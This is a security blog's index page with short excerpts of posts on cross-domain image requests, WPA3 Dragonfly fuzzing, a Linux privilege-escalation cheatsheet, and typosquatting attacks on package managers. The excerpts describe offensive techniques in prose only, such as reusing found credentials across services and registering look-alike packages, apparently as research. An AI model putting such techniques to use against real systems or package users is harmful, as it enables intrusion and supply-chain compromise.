Posted on December 15, 2020 in Security • Tagged with cross-domain-requests, cors, browser • 3 min read
Cross domain requests with <img> tags are not bound to the same origin policy. I will shed light on several possibilities how malicious web site owners can potentially abuse cross domain request done with <img> and script tags created with JavaScript.
Posted on October 19, 2019 in Security • Tagged with WPA3, Dragonfly, SAE, Fuzzing, libFuzzer, Greybox Fuzzing • 8 min read
The results of my Master thesis named Model based fuzzing of the WPA3 Dragonfly handshake will be quickly discussed in this blog post. No severe vulnerabilities were discovered, mostly due to the limited deployment of WPA3 hardware since it's introduction. However, a DoS vulnerability in iwd was found.
Posted on July 18, 2019 in Security • Tagged with wpa3, SAE, Dragonfly, fuzzing • 8 min read
Implementing possible fuzzing strategies with boofuzz against the WPA3 SAE Dragonfly handshake. Dragonfly is the main ingredient of WPA3 certified routers and 802.11 devices.
Posted on August 10, 2016 in Security • Tagged with Linux, Privilege Escalation, root • 3 min read
This blog post will serve as a cheatsheet to help in my future pentesting experiments and wargames when I am stuck and don't know how to proceed. I hope it will be of use for some people out there. This document will likely change and evolve in future revisions.
In this blog post I will discuss common privilege escalation techniques. I assume that an attack got a foothold into the server by spawning a webshell over SQL-Injections or similar web exploitation vectors.
Other people have published great information about privilege escalation process.
Often you can find login credentials to a custom admin web interface in the database. Because humans tend to reuse the same credentials on different services, it's always worth to check if the discovered login credentials work on other services such as SSH or Telnet. If you can access /etc/passwd, you can try all found credentials on all running services on all user accounts in the passwd file …
Posted on June 30, 2016 in Security • Tagged with security, Typosquatting, nuget, cargo • 6 min read
In my last blog post about typosquatting package managers I discussed my findings about attacking the programming language package managers from rubygems.org, PyPi and npmjs.com.
This blog contribution generated quite some interest and people subsequently asked themselves whether other package managers might also be vulnerable to this hybrid attack (typosquatting involves a technical and psychological attack vector). During the time I wrote my thesis, I encountered some other package managers. A very good overview of some of the most recent package managers gives the github showcase page about package managers which is summarized in the table below:
| Package Manager Name | # of Stars on Github |
|---|---|
| bower/bower | 14257 |
| VundleVim/Vundle.vim | 11969 |
| npm/npm | 9664 |
| alcatraz/Alcatraz | 8936 |
| CocoaPods/CocoaPods | 8115 |
| composer/composer | 7909 |
| Carthage/Carthage | 7160 |
| jordansissel/fpm | 6722 |
| componentjs/component | 4503 |
| apple/swift-package-manager | 4318 |
| wbond/package_control | 3018 |
| pypa/pip | 2911 |
| chocolatey/chocolatey | 2741 |
| Masterminds/glide | 2163 |
| tmux-plugins/tpm | 1961 |
| Homebrew/brew | 1757 |
| rust-lang/cargo | 1705 |
| rubygems/rubygems | 1547 |
| caolan/jam | 1540 |
| volojs/volo | 1326 |
| gpmgo/gopm | 1027 |
| spmjs/spm | 882 |
| atom/apm | 690 |
| freshshell/fresh | 674 |
| ruslo/hunter | 436 |
| ocaml/opam | 425 |
| NuGet/Home | 367 |
The obvious question now is: How many of those package managers …
Posted on June 08, 2016 in Security • Tagged with PyPi, Npmjs.com, rubygems.org, security, Typosquatting • 10 min read
Edit: It seems that the blog post and the thesis caused quite some interest. Please contact me under the following mail address: admin [|[at]|] incolumitas [[|dot|]] com
In this blog post, it is demonstrated how
The complete thesis can be downloaded as a PDF.
In the second part of 2015 and the early months of 2016, I worked on my bachelors thesis. In this thesis, I tried to attack programming language package managers such as Pythons PyPi, NodeJS Npmsjs.com and Rubys rubygems.org. The attack does not exploit a new technical vulnerability, it rather tries to trick people into installing packages that they not intended to run on their systems.
In the domain name system, typosquatting is a well known problem. Typosquatting is the malicious registering of a domain that is lexically similar to another, often highly …